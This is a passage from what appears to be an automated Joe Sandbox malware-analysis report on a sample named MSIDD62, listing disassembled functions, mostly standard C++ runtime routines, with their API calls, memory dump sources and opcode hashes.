                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: AdjustPointer
                                                                      • String ID:
                                                                      • API String ID: 1740715915-0
                                                                      • Opcode ID: 24173037dc49a046a54664f95171d98467f1613fd4b1a4d68e21ccc05ca423fe
                                                                      • Instruction ID: 2ee59e8878c644cb9901da022549925be37fd10ee261622cce8bb2c6ecde09e6
                                                                      • Opcode Fuzzy Hash: 24173037dc49a046a54664f95171d98467f1613fd4b1a4d68e21ccc05ca423fe
                                                                      • Instruction Fuzzy Hash: E151CE72600602AFEB288F55D851B6B77A4EF00354F24443FEC526A2D2DB39AC81DBDC
                                                                      Function 003EC9B1 Relevance: 6.1, APIs: 4, Instructions: 146COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003ECA1A
                                                                      • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 003ECA80
                                                                      • std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 003ECB4F
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Locinfo::_$Locinfo_ctorLocinfo_dtorLockitLockit::_
                                                                      • String ID:
                                                                      • API String ID: 2022693140-0
                                                                      • Opcode ID: 0131084aae1ea7da63df401c48c1cd6028d1f3d9a2ec8dfde07de1cf03fb081e
                                                                      • Instruction ID: 2be2b9f43cc5bf9cebd99866b24c2d60547b53f9ab61c1dc6295b5e5b9b8af24
                                                                      • Opcode Fuzzy Hash: 0131084aae1ea7da63df401c48c1cd6028d1f3d9a2ec8dfde07de1cf03fb081e
                                                                      • Instruction Fuzzy Hash: AC5195B1D052D8DAEF12CBE5C5457DDBFB4AF21304F1841A9D440B72C2E7799A09C761
                                                                      Function 00417B18 Relevance: 6.1, APIs: 4, Instructions: 79COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: eb114fe6f1e4b1110b68845a4846e10303189a108da9a04b648973520d7a2640
                                                                      • Instruction ID: f812c61cbacfaf3c77d28d5b4e4902363cddb110cc711865a04f3eb9d4b1633d
                                                                      • Opcode Fuzzy Hash: eb114fe6f1e4b1110b68845a4846e10303189a108da9a04b648973520d7a2640
                                                                      • Instruction Fuzzy Hash: 2621927160C205AFDB20AF72CC80DAB77B9AF0036C710892BF91597641E739EC8187A8
                                                                      Function 003E9020 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 77COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLastError.KERNEL32(00000000,00000000,76B15490,003E8B3A,00000000,?,?,?,?,?,?,?,00000000,0042A285,000000FF), ref: 003E9027
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast
                                                                      • String ID: > returned:$Call to ShellExecute() for verb<$Last error=
                                                                      • API String ID: 1452528299-1781106413
                                                                      • Opcode ID: 3a58e3257ab8644c89ebd193ee7266bed1e668e904e22a7199324111b5fc1a8a
                                                                      • Instruction ID: 71a42a04c7f17b11b832f4b191c5ab90ccd16fd63155b4bb7a13e6a737fa8f46
                                                                      • Opcode Fuzzy Hash: 3a58e3257ab8644c89ebd193ee7266bed1e668e904e22a7199324111b5fc1a8a
                                                                      • Instruction Fuzzy Hash: 7B218E49A202B186CB711F2E8801339A2F0EF58759F65552FD9C9D73D1FB698C81C395
                                                                      Function 003F4403 Relevance: 6.1, APIs: 4, Instructions: 72COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F440A
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F4414
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F44BB
                                                                      • Concurrency::cancel_current_task.LIBCPMT ref: 003F44C6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_$Concurrency::cancel_current_taskH_prolog3Lockit::_Lockit::~_
                                                                      • String ID:
                                                                      • API String ID: 4244582100-0
                                                                      • Opcode ID: 4636d7dad5fc6f8780a75c662b9aec9ad3fe1c4418c58560916f373daf607dd4
                                                                      • Instruction ID: 09558e318f9a0268a67129c47c9a179af92329ab5e33474a329166a7f274520b
                                                                      • Opcode Fuzzy Hash: 4636d7dad5fc6f8780a75c662b9aec9ad3fe1c4418c58560916f373daf607dd4
                                                                      • Instruction Fuzzy Hash: C7216934A00A2ADFCB05EF15C891A6DB761FF49310F01845AEA26AB7A1DF30ED10CF84
                                                                      Function 003F1400 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000004,00000080,00000000,755CD0F6), ref: 003F143C
                                                                      • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F145C
                                                                      • WriteFile.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F148D
                                                                      • CloseHandle.KERNEL32(00000000,?,?,?,00000000,?,40000000,00000001,00000000,00000004,00000080,00000000), ref: 003F14A6
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: File$CloseCreateHandlePointerWrite
                                                                      • String ID:
                                                                      • API String ID: 3604237281-0
                                                                      • Opcode ID: 5507e3d0fc64b8c0a825b44cefb195028b9ade5bffa9f398353c4b6d5cfe2006
                                                                      • Instruction ID: 563e5d8ec2732bd67895a9b87a02baf288e255a4fcedddb56e3fc61d49242413
                                                                      • Opcode Fuzzy Hash: 5507e3d0fc64b8c0a825b44cefb195028b9ade5bffa9f398353c4b6d5cfe2006
                                                                      • Instruction Fuzzy Hash: C0218471A41318EBD721DF54DC05FAABBB8EB45B24F10422AF610A72D0D7B45A05C7D8
                                                                      Function 003F80C5 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F80CC
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F80D6
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8127
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F8147
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 26401bb11e6c4b75496545d205a5aa930df51020ffb3f1b2ca48f5f9fad00e25
                                                                      • Instruction ID: 2cb077f4fa8d4fed9edf7d60d15ba1b748043819f07947460faec80d613c7e53
                                                                      • Opcode Fuzzy Hash: 26401bb11e6c4b75496545d205a5aa930df51020ffb3f1b2ca48f5f9fad00e25
                                                                      • Instruction Fuzzy Hash: 0001C07590066D9BCF06EB64C8456BEB765AF85310F25051AE620AF3D2DF349E028B85
                                                                      Function 003F815A Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F8161
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F816B
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F81BC
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F81DC
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 9b0e60bea47591dc6479bd15969096d0de4a0df10aca7230f94058d326466c1c
                                                                      • Instruction ID: 2e2276e5b1228cf8ac180ffe621c8f205a1e70b2cd335c6b7cd477fed22ed6ae
                                                                      • Opcode Fuzzy Hash: 9b0e60bea47591dc6479bd15969096d0de4a0df10aca7230f94058d326466c1c
                                                                      • Instruction Fuzzy Hash: C501047590061D8BCB06EB64C8457BEB7A1AF84320F25021AE6116B3C2CF349E028B84
                                                                      Function 003F81EF Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F81F6
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F8200
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F8251
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F8271
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 64cf3efd90d3ad0f67b1676039331e1719b57c889cb33a27304fcd52f01731a6
                                                                      • Instruction ID: 403ebe02c81dca49c45f898527543b2cc80995375088139e740a37eb40e9dbea
                                                                      • Opcode Fuzzy Hash: 64cf3efd90d3ad0f67b1676039331e1719b57c889cb33a27304fcd52f01731a6
                                                                      • Instruction Fuzzy Hash: E201C43590061DDBCF06EFA4C9457BEB7B1AF84310F25451AEA106B2D2DF34AE018B94
                                                                      Function 003F79C9 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F79D0
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F79DA
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7A2B
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7A4B
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: e9eae405f66fb84c7488e999bc56a41665feaaecc6018be9114ab1adf096dbec
                                                                      • Instruction ID: 2b1543fa77564c43e514e4ff5537d8756f4862630bf2d4e398ef5df1bbb144b1
                                                                      • Opcode Fuzzy Hash: e9eae405f66fb84c7488e999bc56a41665feaaecc6018be9114ab1adf096dbec
                                                                      • Instruction Fuzzy Hash: 1E01003590062D8BCF02EB64D8026BEBB61AF80310F26015DE620AB3D2CF349E018B84
                                                                      Function 003F7A5E Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7A65
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7A6F
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7AC0
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7AE0
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 860268e3a4bb1faa2f06b4e5a91d6f1beac5dfb48edfa2be9e5a2b20b1426ace
                                                                      • Instruction ID: 6ae9096828a68a626cd51321b76ffb11f3c3956276391f348fab8d02c27a2c43
                                                                      • Opcode Fuzzy Hash: 860268e3a4bb1faa2f06b4e5a91d6f1beac5dfb48edfa2be9e5a2b20b1426ace
                                                                      • Instruction Fuzzy Hash: 7701C07590462D9BCF06EB64D8456BEBB61AF84310F26012AE620AB3D2DF349E018BD5
                                                                      Function 003F7AF3 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7AFA
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7B04
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7B55
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7B75
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 12aef839abb3c3a779ba027263855640caf1010b9d55bd551895a240cf3121e3
                                                                      • Instruction ID: 4dda120a7107e145322a5a93fd919fafdec1c4dcd0240b96d58d68e252203b02
                                                                      • Opcode Fuzzy Hash: 12aef839abb3c3a779ba027263855640caf1010b9d55bd551895a240cf3121e3
                                                                      • Instruction Fuzzy Hash: D201C07690462D8BCB06EBA4C8466BEB771AF85310F25411AE610AF3D2CF349E028BD4
                                                                      Function 003F7B88 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7B8F
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7B99
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7BEA
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7C0A
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: e6bb8a1d20c1ab5cd7985cf16979250fca42b6811689f9f42bdd7b7fb39d7e51
                                                                      • Instruction ID: be97f28593ed3114ea2707b40253aba0c54a08eee0b1296ba84d39e1ab0ea059
                                                                      • Opcode Fuzzy Hash: e6bb8a1d20c1ab5cd7985cf16979250fca42b6811689f9f42bdd7b7fb39d7e51
                                                                      • Instruction Fuzzy Hash: AD01C07590062D9BCF07EBA5D8056BEB761AF84310F24451AE610AB2D2DF749E028BD4
                                                                      Function 00403CD4 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 00403CDB
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 00403CE5
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 00403D36
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 00403D56
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 190c86a84aecd29ddd2cb1d22f7c9d7ac7e5e7c7c4df9f377b1122196b8c0310
                                                                      • Instruction ID: 99403862bdfa1ec809f09da7f61da0edf4c2fcb5f0a6e33de1a20b7c35c0b18c
                                                                      • Opcode Fuzzy Hash: 190c86a84aecd29ddd2cb1d22f7c9d7ac7e5e7c7c4df9f377b1122196b8c0310
                                                                      • Instruction Fuzzy Hash: 2E01C4759006199FCB06EF64D8457BE7B65AF84310F24452AE511BB3D2CF389E0187D8
                                                                      Function 003F7F06 Relevance: 6.0, APIs: 4, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F7F0D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F7F17
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::_Lockit.LIBCPMT ref: 003EBD10
                                                                        • Part of subcall function 003EBCE0: std::_Lockit::~_Lockit.LIBCPMT ref: 003EBD38
                                                                      • std::_Facet_Register.LIBCPMT ref: 003F7F68
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F7F88
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Register
                                                                      • String ID:
                                                                      • API String ID: 2854358121-0
                                                                      • Opcode ID: 7769cc2acf1af31af745adb4066c14bddfa8e3da2f52155496b7486d697e8f61
                                                                      • Instruction ID: caaf45f4cf36d20527209ef6b44a851625d431d53f6718fb7c2d95de0434e3c0
                                                                      • Opcode Fuzzy Hash: 7769cc2acf1af31af745adb4066c14bddfa8e3da2f52155496b7486d697e8f61
                                                                      • Instruction Fuzzy Hash: 9701D27590462D9BCF06EFA4C9457BEB771AF84310F24451AF610AF2D2DF349E028B84
                                                                      Function 003F5C66 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • __EH_prolog3.LIBCMT ref: 003F5C6D
                                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 003F5C78
                                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 003F5CE6
                                                                        • Part of subcall function 003F5DC8: std::locale::_Locimp::_Locimp.LIBCPMT ref: 003F5DE0
                                                                      • std::locale::_Setgloballocale.LIBCPMT ref: 003F5C93
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.1289819753.00000000003E1000.00000020.00000001.01000000.00000004.sdmp, Offset: 003E0000, based on PE: true
                                                                      • Associated: 0000000C.00000002.1289779696.00000000003E0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289865966.000000000042D000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289891415.0000000000443000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                      • Associated: 0000000C.00000002.1289911531.0000000000447000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_3e0000_MSIDD62.jbxd
                                                                      Similarity
                                                                      • API ID: Lockitstd::_std::locale::_$H_prolog3LocimpLocimp::_Lockit::_Lockit::~_Setgloballocale
                                                                      • String ID:
